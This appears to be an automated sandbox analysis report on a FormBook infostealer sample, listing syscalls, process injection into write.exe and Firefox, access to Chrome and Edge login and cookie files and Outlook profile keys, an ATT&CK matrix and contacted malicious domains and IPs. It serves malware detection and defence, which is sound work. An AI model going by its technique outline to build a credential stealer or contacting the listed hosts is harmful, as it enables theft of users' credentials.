        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryInformationToken: Direct from: 0x77A92BCCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenFile: Direct from: 0x77A92CECJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateFile: Direct from: 0x77A92F0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A92B0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenSection: Direct from: 0x77A92D2CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryVolumeInformationFile: Direct from: 0x77A92E4CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtDeviceIoControlFile: Direct from: 0x77A92A0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQuerySystemInformation: Direct from: 0x77A947ECJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryAttributesFile: Direct from: 0x77A92D8CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtSetInformationThread: Direct from: 0x77A92A6CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtSetInformationThread: Direct from: 0x77A86319Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateKey: Direct from: 0x77A92B8CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtClose: Direct from: 0x77A92A8C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A9480CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtProtectVirtualMemory: Direct from: 0x77A92EBCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtWriteVirtualMemory: Direct from: 0x77A9482CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenKeyEx: Direct from: 0x77A92ABCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateUserProcess: Direct from: 0x77A9363CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryInformationProcess: Direct from: 0x77A92B46Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtResumeThread: Direct from: 0x77A92EDCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtDelayExecution: Direct from: 0x77A92CFCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 7336Jump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager&
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,4_2_00405D51

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts212
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		212
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447915 Sample: Nondesistance.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 34 www.wp-bits.online 2->34 36 www.weave.game 2->36 38 33 other IPs or domains 2->38 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 52 4 other signatures 2->52 10 Nondesistance.exe 3 24 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 13 Nondesistance.exe 6 10->13         started        process6 dnsIp7 40 drive.google.com 142.251.16.101, 443, 49827 GOOGLEUS United States 13->40 42 drive.usercontent.google.com 172.253.62.132, 443, 49828 GOOGLEUS United States 13->42 62 Maps a DLL or memory area into another process 13->62 17 jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe 13->17 injected signatures8 process9 dnsIp10 28 www.funtechie.top 203.161.49.193, 49843, 49844, 49845 VNPT-AS-VNVNPTCorpVN Malaysia 17->28 30 academynadpo.ru 185.215.4.19, 49912, 49913, 49914 TVHORADADAES Denmark 17->30 32 12 other IPs or domains 17->32 44 Found direct / indirect Syscall (likely to bypass EDR) 17->44 21 write.exe 13 17->21         started        signatures11 process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 Maps a DLL or memory area into another process 21->60 24 firefox.exe 21->24         started        process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.